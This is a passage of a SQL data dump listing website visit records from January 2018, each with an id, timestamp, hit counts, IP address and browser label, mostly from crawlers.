197298,1515747062,1,1,0,0,'54.36.148.166','other'),(197299,1515748394,1,1,0,0,'178.154.171.88','other'),(197300,1515748825,1,1,0,0,'54.36.148.233','other'),(197301,1515748893,1,1,0,0,'54.36.149.11','other'),(197302,1515748995,1,1,0,0,'54.36.149.54','other'),(197303,1515749313,1,1,0,0,'141.8.142.74','other'),(197304,1515749563,1,1,0,0,'95.135.205.162','chrome'),(197305,1515749966,1,1,0,0,'217.69.133.215','other'),(197306,1515750395,1,1,0,0,'54.36.149.86','other'),(197307,1515750595,1,1,0,0,'54.36.149.68','other'),(197308,1515750889,1,1,0,0,'54.36.148.126','other'),(197309,1515751001,1,1,0,0,'54.36.148.40','other'),(197310,1515751119,1,1,0,0,'54.36.149.36','other'),(197311,1515751178,1,1,0,0,'54.36.148.180','other'),(197312,1515751191,1,1,0,0,'141.8.142.74','other'),(197313,1515751599,1,1,0,0,'54.36.148.136','other'),(197314,1515751626,1,1,0,0,'8.29.198.25','other'),(197315,1515751678,1,1,0,0,'91.209.11.236','other'),(197316,1515751854,1,0,1,0,'66.249.66.157',''),(197317,1515751903,1,1,0,0,'193.93.76.59','chrome'),(197318,1515751920,1,1,0,0,'54.36.149.43','other'),(197319,1515751973,1,1,0,0,'54.36.149.37','other'),(197320,1515751980,1,1,0,0,'217.69.133.219','other'),(197321,1515752043,1,1,0,0,'217.69.133.236','other'),(197322,1515752160,1,1,0,0,'141.8.142.74','other'),(197323,1515752507,1,1,0,0,'54.36.148.142','other'),(197324,1515752656,1,1,0,0,'217.69.133.222','other'),(197325,1515752658,1,1,0,0,'217.69.133.221','other'),(197326,1515753016,1,1,0,0,'178.251.107.255','chrome'),(197327,1515753256,2,2,0,0,'141.8.142.74','other'),(197328,1515753329,1,1,0,0,'217.69.133.236','other'),(197329,1515753331,1,1,0,0,'217.69.133.237','other'),(197330,1515753367,1,1,0,0,'54.36.148.153','other'),(197331,1515753521,1,1,0,0,'54.36.148.80','other'),(197332,1515753976,1,1,0,0,'54.36.148.141','other'),(197333,1515754071,1,1,0,0,'54.36.149.29','other'),(197334,1515754298,1,1,0,0,'54.36.148.78','other'),(197335,1515754389,1,1,0,0,'134.249.146.125','chrome'),(197336,1515754693,1,1,0,0,'91.196.178.67','chrome'),(197337,1515754704,1,1,0,0,'54.36.149.48','other'),(197338,1515754744,1,1,0,0,'79.143.186.26','other'),(197339,1515754765,1,1,0,0,'217.69.133.219','other'),(197340,1515754766,1,1,0,0,'54.36.148.236','other'),(197341,1515754903,1,1,0,0,'91.196.178.102','chrome'),(197342,1515755083,1,1,0,0,'37.9.113.207','other'),(197343,1515755114,1,1,0,0,'5.45.207.49','other'),(197344,1515755118,1,1,0,0,'178.154.200.32','other'),(197345,1515755121,1,1,0,0,'178.154.200.28','other'),(197346,1515755125,1,1,0,0,'87.250.224.125','other'),(197347,1515755129,1,1,0,0,'178.154.171.24','other'),(197348,1515755132,1,1,0,0,'37.9.113.80','other'),(197349,1515755156,1,1,0,0,'51.255.71.126','other'),(197350,1515755255,1,1,0,0,'217.69.136.209','other'),(197351,1515755377,1,1,0,0,'54.36.149.105','other'),(197352,1515755378,1,1,0,0,'217.69.133.192','other'),(197353,1515756444,1,1,0,0,'91.196.178.165','chrome'),(197354,1515756636,1,1,0,0,'37.57.81.28','firefox'),(197355,1515756916,1,1,0,0,'178.154.171.81','other'),(197356,1515756919,1,1,0,0,'178.154.200.28','other'),(197357,1515757041,1,1,0,0,'5.45.207.30','other'),(197358,1515757345,1,1,0,0,'217.69.133.84','other'),(197359,1515757395,1,1,0,0,'80.70.77.155','chrome'),(197360,1515758198,1,1,0,0,'54.36.149.53','other'),(197361,1515758253,1,1,0,0,'54.36.149.2','other'),(197362,1515758279,1,1,0,0,'178.95.244.78','chrome'),(197363,1515758350,2,2,0,0,'40.77.167.121','other'),(197364,1515758873,1,1,0,0,'178.154.171.88','other'),(197365,1515758881,1,1,0,0,'109.194.87.169','other'),(197366,1515758947,1,1,0,0,'54.36.148.48','other'),(197367,1515759047,1,1,0,0,'141.8.142.74','other'),(197368,1515759593,1,1,0,0,'54.36.149.9','other'),(197369,1515759787,1,1,0,0,'178.154.171.88','other'),(197370,1515760040,1,1,0,0,'54.36.148.43','other'),(197371,1515760093,1,1,0,0,'207.46.13.0','other'),(197372,1515760146,1,1,0,0,'217.69.133.247','other'),(197373,1515760253,1,1,0,0,'54.36.149.11','other'),(197374,1515760434,1,1,0,0,'91.196.178.70','chrome'),(197375,1515760450,1,1,0,0,'91.196.178.165','chrome'),(197376,1515760807,1,1,0,0,'54.36.148.168','other'),(197377,1515761291,1,1,0,0,'216.244.66.237','other'),(197378,1515761380,1,1,0,0,'178.93.148.163','chrome'),(197379,1515761400,1,1,0,0,'37.52.178.178','chrome'),(197380,1515761457,1,1,0,0,'91.209.11.236','other'),(197381,1515761538,1,1,0,0,'54.36.149.70','other'),(197382,1515761546,1,1,0,0,'178.251.107.255','chrome'),(197383,1515761825,1,1,0,0,'217.69.133.217','other'),(197384,1515762257,1,1,0,0,'54.36.149.3','other'),(197385,1515762260,1,1,0,0,'54.36.148.197','other'),(197386,1515762283,1,1,0,0,'162.210.196.100','other'),(197387,1515762333,1,1,0,0,'217.69.133.85','other'),(197388,1515762439,1,1,0,0,'91.209.11.236','other'),(197389,1515762466,1,1,0,0,'8.29.198.25','other'),(197390,1515762633,1,1,0,0,'87.250.224.46','other'),(197391,1515762789,1,1,0,0,'157.55.39.66','other'),(197392,1515762878,1,1,0,0,'54.36.148.177','other'),(197393,1515763128,1,1,0,0,'54.36.148.131','other'),(197394,1515763369,1,1,0,0,'91.209.11.236','other'),(197395,1515763704,1,1,0,0,'54.36.148.254','other'),(197396,1515763874,1,1,0,0,'54.36.148.162','other'),(197397,1515764052,1,1,0,0,'91.196.178.165','chrome'),(197398,1515764153,1,1,0,0,'46.200.57.178','chrome'),(197399,1515764243,1,1,0,0,'157.55.39.66','other'),(197400,1515764323,2,2,0,0,'91.209.11.236','other'),(197401,1515764334,1,1,0,0,'91.196.178.134','firefox'),(197402,1515764361,1,1,0,0,'141.8.142.74','other'),(197403,1515764837,1,1,0,0,'54.36.148.231','other'),(197404,1515765079,1,1,0,0,'54.36.149.105','other'),(197405,1515765099,1,1,0,0,'54.36.148.60','other'),(197406,1515765207,1,1,0,0,'54.36.148.244','other'),(197407,1515765328,1,1,0,0,'54.36.148.187','other'),(197408,1515765431,1,1,0,0,'217.69.133.216','other'),(197409,1515765533,1,1,0,0,'54.36.148.179','other'),(197410,1515765576,1,1,0,0,'54.36.148.116','other'),(197411,1515765692,1,1,0,0,'54.36.148.53','other'),(197412,1515765736,1,1,0,0,'88.135.194.147','chrome'),(197413,1515766200,1,1,0,0,'141.8.142.74','other'),(197414,1515766319,1,1,0,0,'51.255.71.132','other'),(197415,1515768090,1,1,0,0,'91.196.178.67','firefox'),(197416,1515768127,1,1,0,0,'54.36.148.60','other'),(197417,1515768130,1,1,0,0,'188.230.43.254','other'),(197418,1515768135,1,1,0,0,'54.36.148.37','other'),(197419,1515768659,1,1,0,0,'217.69.133.23','other'),(197420,1515768839,1,1,0,0,'54.36.148.73','other'),(197421,1515768938,1,1,0,0,'217.69.133.231','other'),(197422,1515769131,1,1,0,0,'54.36.148.56','other'),(197423,1515769349,1,1,0,0,'54.36.148.68','other'),(197424,1515769354,1,1,0,0,'51.255.71.118','other'),(197425,1515769532,1,1,0,0,'91.209.11.236','other'),(197426,1515769560,1,1,0,0,'54.36.149.10','other'),(197427,1515770023,1,1,0,0,'54.36.149.99','other'),(197428,1515770143,1,1,0,0,'54.36.148.155','other'),(197429,1515770465,1,1,0,0,'37.53.123.170','chrome'),(197430,1515770701,1,1,0,0,'51.255.71.115','other'),(197431,1515770965,1,1,0,0,'207.46.13.0','other'),(197432,1515770982,1,1,0,0,'109.86.157.91','other'),(197433,1515771157,1,1,0,0,'54.36.148.104','other'),(197434,1515771234,1,1,0,0,'54.36.148.159','other'),(197435,1515771567,1,1,0,0,'54.36.149.28','other'),(197436,1515772006,1,1,0,0,'54.36.149.97','other'),(197437,1515772042,1,1,0,0,'54.36.148.117','other'),(197438,1515772273,1,1,0,0,'216.244.66.237','other'),(197439,1515772617,2,2,0,0,'138.201.37.205','other'),(197440,1515772650,1,1,0,0,'54.36.148.178','other'),(197441,1515772794,2,2,0,0,'217.69.136.208','other'),(197442,1515773260,1,1,0,0,'54.36.148.72','other'),(197443,1515773311,1,1,0,0,'8.29.198.26','other'),(197444,1515773409,1,1,0,0,'51.255.71.121','other'),(197445,1515773529,1,1,0,0,'157.55.39.66','other'),(197446,1515774604,1,1,0,0,'54.36.148.28','other'),(197447,1515774788,1,1,0,0,'217.69.133.215','other'),(197448,1515774862,1,1,0,0,'188.230.43.254','other'),(197449,1515775137,1,1,0,0,'217.69.133.221','other'),(197450,1515775822,2,2,0,0,'216.244.66.246','other'),(197451,1515776578,1,1,0,0,'217.69.136.204','other'),(197452,1515776900,1,1,0,0,'91.196.178.131','chrome'),(197453,1515776940,1,1,0,0,'91.209.11.236','other'),(197454,1515777263,1,1,0,0,'188.230.43.254','other'),(197455,1515778109,1,1,0,0,'195.184.208.222','firefox'),(197456,1515778590,1,1,0,0,'91.196.178.12','chrome'),(197457,1515779761,1,1,0,0,'91.196.178.131','chrome'),(197458,1515779864,1,1,0,0,'91.209.11.236','other'),(197459,1515780549,1,1,0,0,'217.69.133.251','other'),(197460,1515780938,1,1,0,0,'51.255.71.122','other'),(197461,1515781153,1,1,0,0,'54.36.148.235','other'),(197462,1515781297,1,1,0,0,'66.249.66.74','chrome'),(197463,1515781310,1,1,0,0,'51.255.71.123','other'),(197464,1515781343,1,1,0,0,'157.55.39.66','other'),(197465,1515781814,1,1,0,0,'54.36.148.248','other'),(197466,1515782281,1,0,1,0,'66.249.66.76',''),(197467,1515782482,1,1,0,0,'217.69.136.208','other'),(197468,1515782484,1,1,0,0,'217.69.136.203','other'),(197469,1515782704,1,1,0,0,'54.36.149.38','other'),(197470,1515782792,1,1,0,0,'54.36.148.244','other'),(197471,1515782865,1,1,0,0,'54.36.148.76','other'),(197472,1515784157,1,1,0,0,'8.29.198.27','other'),(197473,1515784600,1,0,1,0,'66.249.66.75',''),(197474,1515784746,1,1,0,0,'54.36.148.182','other'),(197475,1515785092,1,1,0,0,'54.36.149.100','other'),(197476,1515785614,1,1,0,0,'91.196.178.166','chrome'),(197477,1515785844,1,1,0,0,'217.69.133.67','other'),(197478,1515786101,1,1,0,0,'217.69.133.192','other'),(197479,1515786182,1,1,0,0,'54.36.148.252','other'),(197480,1515786229,1,1,0,0,'54.36.148.26','other'),(197481,1515786320,1,1,0,0,'54.36.148.90','other'),(197482,1515786457,1,1,0,0,'54.36.149.41','other'),(197483,1515786459,1,1,0,0,'216.244.66.246','other'),(197484,1515786514,1,1,0,0,'217.69.133.238','other'),(197485,1515786789,1,1,0,0,'217.69.133.242','other'),(197486,1515787627,1,1,0,0,'217.69.133.67','other'),(197487,1515787774,1,1,0,0,'217.69.133.59','other'),(197488,1515787777,1,1,0,0,'217.69.133.60','other'),(197489,1515787794,1,1,0,0,'54.36.149.49','other'),(197490,1515788286,1,1,0,0,'54.36.148.251','other'),(197491,1515788365,1,1,0,0,'54.36.149.23','other'),(197492,1515788503,1,1,0,0,'217.69.133.246','other'),(197493,1515788852,1,1,0,0,'207.46.13.0','other'),(197494,1515788905,1,1,0,0,'91.196.178.69','chrome'),(197495,1515789763,1,1,0,0,'217.69.133.60','other'),(197496,1515790202,1,1,0,0,'217.69.136.205','other'),(197497,1515790451,1,1,0,0,'46.211.96.87','chrome'),(197498,1515790787,1,1,0,0,'54.36.149.58','other'),(197499,1515790924,1,1,0,0,'54.36.148.120','other'),(197500,1515791450,1,1,0,0,'91.209.11.236','other'),(197501,1515791477,1,1,0,0,'54.36.148.106','other'),(197502,1515791486,1,1,0,0,'54.36.149.87','other'),(197503,1515791896,1,1,0,0,'54.36.148.127','other'),(197504,1515792129,1,1,0,0,'217.69.133.30','other'),(197505,1515792631,1,1,0,0,'54.36.148.57','other'),(197506,1515792642,1,1,0,0,'54.36.149.4','other'),(197507,1515792723,1,1,0,0,'157.55.39.66','other'),(197508,1515793373,1,1,0,0,'54.36.149.85','other'),(197509,1515793455,1,1,0,0,'66.249.65.156','chrome'),(197510,1515793833,1,1,0,0,'54.36.148.162','other'),(197511,1515793896,1,1,0,0,'54.36.148.72','other'),(197512,1515794204,1,1,0,0,'54.36.148.96','other'),(197513,1515794433,1,1,0,0,'91.209.11.236','other'),(197514,1515794531,1,1,0,0,'217.69.133.12','other'),(197515,1515794578,1,1,0,0,'54.36.148.243','other'),(197516,1515794789,1,1,0,0,'54.36.149.49','other'),(197517,1515794966,1,1,0,0,'54.36.148.97','other'),(197518,1515795026,1,1,0,0,'8.29.198.25','other'),(197519,1515795089,1,1,0,0,'54.36.148.143','other'),(197520,1515795150,1,1,0,0,'217.69.133.29','other'),(197521,1515795412,1,1,0,0,'54.36.148.85','other'),(197522,1515795641,1,1,0,0,'217.69.136.207','other'),(197523,1515796025,1,1,0,0,'40.77.167.194','other'),(197524,1515796104,1,1,0,0,'217.69.136.204','other'),(197525,1515797132,1,1,0,0,'54.36.149.82','other'),(197526,1515797178,1,1,0,0,'217.69.133.14','other'),(197527,1515797230,1,1,0,0,'54.36.148.25','other'),(197528,1515797659,2,2,0,0,'216.244.66.194','other'),(197529,1515797841,2,2,0,0,'216.244.66.246','other'),(197530,1515798341,1,1,0,0,'54.36.148.159','other'),(197531,1515798599,1,1,0,0,'54.36.149.53','other'),(197532,1515799104,1,1,0,0,'157.55.39.66','other'),(197533,1515799313,2,2,0,0,'217.69.136.210','other'),(197534,1515799596,1,1,0,0,'217.69.133.13','other'),(197535,1515799653,1,1,0,0,'54.36.148.247','other'),(197536,1515799704,1,1,0,0,'54.36.149.7','other'),(197537,1515800312,1,1,0,0,'207.46.13.0','other'),(197538,1515800368,1,1,0,0,'217.69.133.248','other'),(197539,1515800372,1,1,0,0,'217.69.133.249','other'),(197540,1515800518,1,1,0,0,'54.90.217.44','other'),(197541,1515801158,1,1,0,0,'54.36.148.40','other'),(197542,1515801281,1,1,0,0,'54.36.149.16','other'),(197543,1515801321,1,1,0,0,'217.69.136.207','other'),(197544,1515801343,1,1,0,0,'216.244.66.194','other'),(197545,1515801433,1,1,0,0,'54.36.148.248','other'),(197546,1515802117,1,1,0,0,'176.193.114.160','msie'),(197547,1515802118,1,1,0,0,'46.242.73.11','msie'),(197548,1515802772,1,1,0,0,'217.69.133.230','other'),(197549,1515802867,1,0,1,0,'66.249.65.158',''),(197550,1515803036,1,1,0,0,'74.115.214.151','other'),(197551,1515803119,1,1,0,0,'217.69.136.210','other'),(197552,1515804115,1,1,0,0,'216.244.66.237','other'),(197553,1515804128,1,1,0,0,'217.69.133.191','other'),(197554,1515804298,1,1,0,0,'207.46.13.0','other'),(197555,1515804564,1,1,0,0,'54.90.217.44','other'),(197556,1515804767,1,1,0,0,'54.36.149.98','other'),(197557,1515805115,1,1,0,0,'54.36.148.91','other'),(197558,1515805278,1,0,1,0,'66.249.73.131',''),(197559,1515805423,1,1,0,0,'54.36.148.143','other'),(197560,1515805820,1,1,0,0,'54.36.148.92','other'),(197561,1515805875,1,1,0,0,'8.29.198.25','other'),(197562,1515806081,1,1,0,0,'216.244.66.194','other'),(197563,1515806313,1,1,0,0,'54.36.148.133','other'),(197564,1515806413,1,1,0,0,'54.36.149.94','other'),(197565,1515806997,1,1,0,0,'178.154.171.88','other'),(197566,1515807324,1,1,0,0,'207.46.13.0','other'),(197567,1515807350,1,1,0,0,'217.69.133.230','other'),(197568,1515807501,1,1,0,0,'216.244.66.246','other'),(197569,1515807583,1,1,0,0,'54.36.148.150','other'),(197570,1515808147,1,1,0,0,'217.69.133.246','other'),(197571,1515808326,1,1,0,0,'54.36.149.19','other'),(197572,1515808563,1,1,0,0,'54.36.148.162','other'),(197573,1515809122,1,1,0,0,'54.36.148.234','other'),(197574,1515809690,1,1,0,0,'54.36.148.34','other'),(197575,1515809969,1,1,0,0,'54.36.148.22','other'),(197576,1515810119,1,1,0,0,'54.36.148.59','other'),(197577,1515810375,1,1,0,0,'54.36.148.197','other'),(197578,1515811126,1,1,0,0,'216.244.66.194','other'),(197579,1515811542,1,0,1,0,'66.249.73.131',''),(197580,1515813025,1,1,0,0,'217.69.133.253','other'),(197581,1515813477,1,1,0,0,'54.90.217.44','other'),(197582,1515813664,1,1,0,0,'54.36.149.13','other'),(197583,1515814426,1,1,0,0,'54.36.148.153','other'),(197584,1515814472,1,1,0,0,'54.36.149.36','other'),(197585,1515815238,1,1,0,0,'40.77.167.194','other'),(197586,1515815290,1,1,0,0,'54.36.148.73','other'),(197587,1515815370,1,1,0,0,'217.69.133.69','other'),(197588,1515815390,1,1,0,0,'54.36.148.252','other'),(197589,1515815517,1,1,0,0,'217.69.133.11','other'),(197590,1515815520,1,1,0,0,'217.69.133.14','other'),(197591,1515815534,1,1,0,0,'217.69.133.249','other'),(197592,1515815535,1,1,0,0,'217.69.133.23','other'),(197593,1515815866,1,1,0,0,'109.194.87.169','chrome'),(197594,1515816393,1,1,0,0,'54.36.148.167','other'),(197595,1515816520,1,1,0,0,'54.36.149.85','other'),(197596,1515816719,1,1,0,0,'8.29.198.26','other'),(197597,1515816866,2,2,0,0,'216.244.66.194','other'),(197598,1515816920,1,1,0,0,'207.46.13.0','other'),(197599,1515817285,1,1,0,0,'54.90.217.44','other'),(197600,1515817858,1,1,0,0,'54.36.148.144','other'),(197601,1515818692,1,1,0,0,'217.69.136.205','other'),(197602,1515818945,1,1,0,0,'51.255.71.133','other'),(197603,1515819162,1,1,0,0,'217.69.133.231','other'),(197604,1515819296,3,3,0,0,'216.244.66.194','other'),(197605,1515819474,1,1,0,0,'54.90.217.44','other'),(197606,1515819661,1,1,0,0,'54.36.148.158','other'),(197607,1515819699,1,1,0,0,'54.36.148.237','other'),(197608,1515820477,1,1,0,0,'54.36.148.174','other'),(197609,1515820870,1,1,0,0,'54.36.148.81','other'),(197610,1515821045,2,2,0,0,'217.69.133.23','other'),(197611,1515822208,1,1,0,0,'54.36.148.184','other'),(197612,1515822725,1,1,0,0,'217.69.133.239','other'),(197613,1515823924,1,1,0,0,'146.185.223.25','firefox'),(197614,1515824543,1,1,0,0,'54.36.148.253','other'),(197615,1515824567,1,1,0,0,'54.36.148.169','other'),(197616,1515825339,1,1,0,0,'54.36.148.31','other'),(197617,1515825777,1,1,0,0,'54.36.149.97','other'),(197618,1515825976,1,1,0,0,'54.36.149.74','other'),(197619,1515826099,1,1,0,0,'54.36.149.76','other'),(197620,1515826204,1,1,0,0,'54.36.148.168','other'),(197621,1515826480,1,1,0,0,'217.69.133.72','other'),(197622,1515826496,1,1,0,0,'157.55.39.66','other'),(197623,1515826695,1,1,0,0,'54.36.148.101','other'),(197624,1515826791,1,1,0,0,'217.69.133.251','other'),(197625,1515827093,1,1,0,0,'54.36.149.40','other'),(197626,1515827206,1,1,0,0,'54.36.148.118','other'),(197627,1515827280,1,1,0,0,'141.8.142.74','other'),(197628,1515827575,1,1,0,0,'8.29.198.25','other'),(197629,1515827829,1,0,1,0,'66.249.73.135',''),(197630,1515827896,1,1,0,0,'54.36.149.10','other'),(197631,1515828033,1,1,0,0,'40.77.167.112','other'),(197632,1515828530,1,1,0,0,'54.36.148.71','other'),(197633,1515828580,1,1,0,0,'216.244.66.194','other'),(197634,1515828640,1,1,0,0,'91.196.178.38','chrome'),(197635,1515828891,1,1,0,0,'54.36.148.43','other'),(197636,1515829399,1,1,0,0,'54.36.149.1','other'),(197637,1515829644,1,1,0,0,'89.102.50.17','chrome'),(197638,1515829731,1,1,0,0,'54.36.149.17','other'),(197639,1515829774,1,1,0,0,'54.36.148.168','other'),(197640,1515829996,1,1,0,0,'54.36.148.110','other'),(197641,1515830057,1,1,0,0,'141.8.142.74','other'),(197642,1515830250,1,1,0,0,'54.36.148.105','other'),(197643,1515830294,1,1,0,0,'54.36.148.41','other'),(197644,1515830476,1,1,0,0,'54.36.148.90','other'),(197645,1515830958,1,1,0,0,'91.250.36.64','chrome'),(197646,1515830991,1,1,0,0,'54.36.149.45','other'),(197647,1515831178,1,0,1,0,'66.249.73.131',''),(197648,1515831192,1,1,0,0,'54.36.148.156','other'),(197649,1515831321,1,1,0,0,'54.36.148.117','other'),(197650,1515831508,1,1,0,0,'54.36.148.48','other'),(197651,1515831685,1,1,0,0,'51.255.71.113','other'),(197652,1515832359,1,1,0,0,'54.36.148.152','other'),(197653,1515832376,1,1,0,0,'176.119.89.30','chrome'),(197654,1515832620,1,1,0,0,'54.36.148.244','other'),(197655,1515832832,1,1,0,0,'217.69.133.14','other'),(197656,1515832934,1,1,0,0,'54.36.148.231','other'),(197657,1515833049,1,1,0,0,'141.8.142.74','other'),(197658,1515833170,1,1,0,0,'54.36.148.193','other'),(197659,1515833595,1,1,0,0,'66.249.65.157','chrome'),(197660,1515833708,1,1,0,0,'51.255.71.122','other'),(197661,1515833797,1,1,0,0,'54.36.148.28','other'),(197662,1515833995,1,1,0,0,'54.36.149.17','other'),(197663,1515834187,1,1,0,0,'54.36.149.96','other'),(197664,1515834256,1,1,0,0,'54.36.148.74','other'),(197665,1515834347,2,2,0,0,'216.244.66.246','other'),(197666,1515834491,1,1,0,0,'54.36.149.23','other'),(197667,1515834646,1,1,0,0,'54.36.148.250','other'),(197668,1515835026,1,1,0,0,'54.36.148.79','other'),(197669,1515835163,1,1,0,0,'217.69.133.220','other'),(197670,1515835248,1,1,0,0,'54.36.148.229','other'),(197671,1515835403,1,1,0,0,'54.36.149.29','other'),(197672,1515835496,1,1,0,0,'54.36.149.66','other'),(197673,1515835605,1,1,0,0,'54.36.148.21','other'),(197674,1515835738,1,1,0,0,'54.36.149.88','other'),(197675,1515835872,1,1,0,0,'54.36.149.96','other'),(197676,1515835937,1,1,0,0,'91.196.178.163','chrome'),(197677,1515836103,1,1,0,0,'54.36.148.113','other'),(197678,1515836144,1,1,0,0,'217.69.133.227','other'),(197679,1515836351,1,1,0,0,'54.36.148.132','other'),(197680,1515836516,1,1,0,0,'217.69.133.191','other'),(197681,1515836591,1,1,0,0,'54.36.148.180','other'),(197682,1515836728,1,1,0,0,'54.36.149.34','other'),(197683,1515837084,1,1,0,0,'54.36.148.188','other'),(197684,1515837241,1,1,0,0,'54.36.148.246','other'),(197685,1515837811,1,1,0,0,'157.55.39.66','other'),(197686,1515837948,1,1,0,0,'54.36.149.45','other'),(197687,1515838150,1,1,0,0,'54.36.149.34','other'),(197688,1515838224,1,1,0,0,'54.36.148.246','other'),(197689,1515838268,1,1,0,0,'141.8.142.74','other'),(197690,1515838429,1,1,0,0,'8.29.198.27','other'),(197691,1515838438,1,1,0,0,'217.69.133.227','other'),(197692,1515838779,1,1,0,0,'217.69.136.205','other'),(197693,1515838780,1,1,0,0,'5.58.53.161','firefox'),(197694,1515839031,1,1,0,0,'54.36.149.70','other'),(197695,1515839075,1,1,0,0,'54.36.148.67','other'),(197696,1515839318,1,1,0,0,'54.36.148.129','other'),(197697,1515840207,1,1,0,0,'54.36.148.17','other'),(197698,1515840315,1,1,0,0,'54.36.148.105','other'),(197699,1515840480,1,1,0,0,'54.36.148.232','other'),(197700,1515840582,1,1,0,0,'217.69.133.228','other'),(197701,1515840604,1,1,0,0,'54.36.148.15','other'),(197702,1515840607,1,1,0,0,'54.36.148.159','other'),(197703,1515840766,1,1,0,0,'54.36.148.191','other'),(197704,1515840842,1,1,0,0,'216.244.66.237','other'),(197705,1515840880,1,1,0,0,'195.54.42.24','chrome'),(197706,1515841249,1,0,1,0,'66.249.73.135',''),(197707,1515841539,1,1,0,0,'54.36.148.157','other'),(197708,1515842503,1,1,0,0,'54.36.148.203','other'),(197709,1515842542,1,1,0,0,'54.36.149.107','other'),(197710,1515842852,1,1,0,0,'141.8.142.74','other'),(197711,1515843088,1,1,0,0,'54.36.148.32','other'),(197712,1515843173,1,1,0,0,'13.56.229.65','chrome'),(197713,1515843295,1,1,0,0,'91.196.178.59','other'),(197714,1515843307,1,1,0,0,'217.69.133.230','other'),(197715,1515843371,1,1,0,0,'46.4.32.75','other'),(197716,1515843779,1,1,0,0,'207.46.13.0','other'),(197717,1515843840,1,1,0,0,'54.36.148.75','other'),(197718,1515844117,1,1,0,0,'54.36.148.128','other'),(197719,1515844506,1,1,0,0,'91.196.178.53','chrome'),(197720,1515844752,1,1,0,0,'54.36.149.41','other'),(197721,1515844936,1,1,0,0,'217.69.133.29','other'),(197722,1515845002,1,1,0,0,'217.69.133.14','other'),(197723,1515845401,1,1,0,0,'51.255.71.121','other'),(197724,1515845556,1,1,0,0,'54.36.149.11','other'),(197725,1515845795,1,1,0,0,'217.69.133.238','other'),(197726,1515845999,1,1,0,0,'217.69.133.29','other'),(197727,1515846174,1,1,0,0,'54.36.148.15','other'),(197728,1515846212,1,1,0,0,'54.36.148.63','other'),(197729,1515846250,1,1,0,0,'54.36.149.35','other'),(197730,1515846802,1,1,0,0,'46.119.116.151','other'),(197731,1515846874,1,1,0,0,'54.36.148.95','other'),(197732,1515847560,1,1,0,0,'178.95.156.151','chrome'),(197733,1515848061,1,1,0,0,'217.69.133.223','other'),(197734,1515848148,1,1,0,0,'54.36.149.44','other'),(197735,1515848317,1,1,0,0,'217.69.133.229','other'),(197736,1515848432,1,1,0,0,'54.36.148.57','other'),(197737,1515848523,1,1,0,0,'54.36.149.106','other'),(197738,1515848737,1,1,0,0,'54.36.149.88','other'),(197739,1515848738,1,1,0,0,'40.77.167.194','other'),(197740,1515848825,1,1,0,0,'54.36.148.112','other'),(197741,1515848903,1,1,0,0,'54.36.148.124','other'),(197742,1515849141,8,8,0,0,'69.30.198.178','other'),(197743,1515849281,1,1,0,0,'8.29.198.25','other'),(197744,1515849358,1,1,0,0,'91.209.11.236','other'),(197745,1515849825,1,1,0,0,'54.36.148.93','other'),(197746,1515849923,1,1,0,0,'40.77.167.194','other'),(197747,1515850043,1,1,0,0,'54.36.149.73','other'),(197748,1515850184,1,0,1,0,'66.249.73.131',''),(197749,1515850352,1,1,0,0,'216.244.66.194','other'),(197750,1515850423,1,1,0,0,'54.36.149.0','other'),(197751,1515850430,1,1,0,0,'217.69.133.69','other'),(197752,1515850432,1,1,0,0,'217.69.133.231','other'),(197753,1515850522,1,1,0,0,'204.79.180.21','msie'),(197754,1515850631,1,1,0,0,'52.34.123.236','chrome'),(197755,1515851596,1,1,0,0,'40.77.167.194','other'),(197756,1515851614,2,2,0,0,'178.154.171.88','other'),(197757,1515852270,1,1,0,0,'54.36.149.90','other'),(197758,1515852686,1,1,0,0,'54.36.148.54','other'),(197759,1515852706,1,0,1,0,'66.249.73.135',''),(197760,1515852748,1,1,0,0,'54.36.148.246','other'),(197761,1515853005,1,1,0,0,'40.77.167.112','other'),(197762,1515853006,1,1,0,0,'54.36.148.119','other'),(197763,1515853385,1,1,0,0,'54.36.148.78','other'),(197764,1515853407,1,1,0,0,'217.69.133.253','other'),(197765,1515853597,1,1,0,0,'217.69.133.14','other'),(197766,1515853620,1,1,0,0,'216.244.66.246','other'),(197767,1515853666,1,1,0,0,'162.210.196.129','other'),(197768,1515853671,1,1,0,0,'157.55.39.66','other'),(197769,1515853737,1,1,0,0,'54.36.148.180','other'),(197770,1515853997,1,0,1,0,'66.249.65.156',''),(197771,1515854080,1,1,0,0,'54.36.148.235','other'),(197772,1515854223,2,2,0,0,'178.95.247.76','chrome'),(197773,1515854363,1,1,0,0,'54.36.149.3','other'),(197774,1515854374,1,1,0,0,'217.69.133.232','other'),(197775,1515854884,1,1,0,0,'54.36.148.102','other'),(197776,1515855106,1,1,0,0,'54.36.149.93','other'),(197777,1515855174,1,1,0,0,'178.95.247.76','chrome'),(197778,1515855256,1,1,0,0,'217.69.133.229','other'),(197779,1515855283,1,1,0,0,'54.36.148.15','other'),(197780,1515855332,1,1,0,0,'91.196.178.97','chrome'),(197781,1515855733,1,1,0,0,'54.36.149.86','other'),(197782,1515856040,1,1,0,0,'54.36.149.57','other'),(197783,1515856280,1,1,0,0,'157.55.39.66','other'),(197784,1515856676,1,1,0,0,'216.244.66.194','other'),(197785,1515856900,1,1,0,0,'51.255.71.113','other'),(197786,1515856904,1,1,0,0,'54.36.149.63','other'),(197787,1515857089,1,1,0,0,'54.36.148.149','other'),(197788,1515857539,1,0,1,0,'66.249.73.137',''),(197789,1515857961,1,1,0,0,'217.69.133.215','other'),(197790,1515858117,1,1,0,0,'54.36.148.206','other'),(197791,1515858432,1,1,0,0,'54.36.149.2','other'),(197792,1515858443,1,0,1,0,'66.249.73.137',''),(197793,1515858776,1,0,1,0,'68.180.229.104',''),(197794,1515859118,1,1,0,0,'54.36.148.115','other'),(197795,1515859318,1,1,0,0,'54.36.149.93','other'),(197796,1515859546,1,1,0,0,'5.35.119.16','chrome'),(197797,1515859851,1,1,0,0,'216.244.66.194','other'),(197798,1515859975,1,1,0,0,'178.154.171.88','other'),(197799,1515860136,1,1,0,0,'8.29.198.27','other'),(197800,1515860497,1,1,0,0,'217.69.133.233','other'),(197801,1515860511,1,1,0,0,'54.36.148.135','other'),(197802,1515860599,1,1,0,0,'54.36.148.177','other'),(197803,1515860605,1,1,0,0,'157.55.39.111','other'),(197804,1515860795,1,1,0,0,'40.77.167.112','other'),(197805,1515860954,1,1,0,0,'51.255.71.128','other'),(197806,1515860977,1,1,0,0,'217.69.133.253','other'),(197807,1515861211,1,1,0,0,'54.36.148.136','other'),(197808,1515861239,1,1,0,0,'46.48.13.161','chrome'),(197809,1515861540,1,1,0,0,'54.36.148.235','other'),(197810,1515861880,1,1,0,0,'54.36.148.164','other'),(197811,1515861914,1,1,0,0,'66.249.65.156','chrome'),(197812,1515861